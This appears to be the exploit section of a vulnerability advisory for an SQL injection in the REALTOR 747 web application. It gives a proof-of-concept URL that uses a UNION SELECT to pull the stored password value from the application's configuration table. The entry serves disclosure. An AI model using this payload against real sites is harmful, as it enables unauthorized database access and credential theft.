REALTOR 747 Index.PHP SQL Injection Vulnerability

info
discussion
exploit
solution
references

REALTOR 747 Index.PHP SQL Injection Vulnerability

No exploit is required.

A proof-of-concept URI has been provided:

http://www.example.com/realtor747/index.php?pageid=2&categoryid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*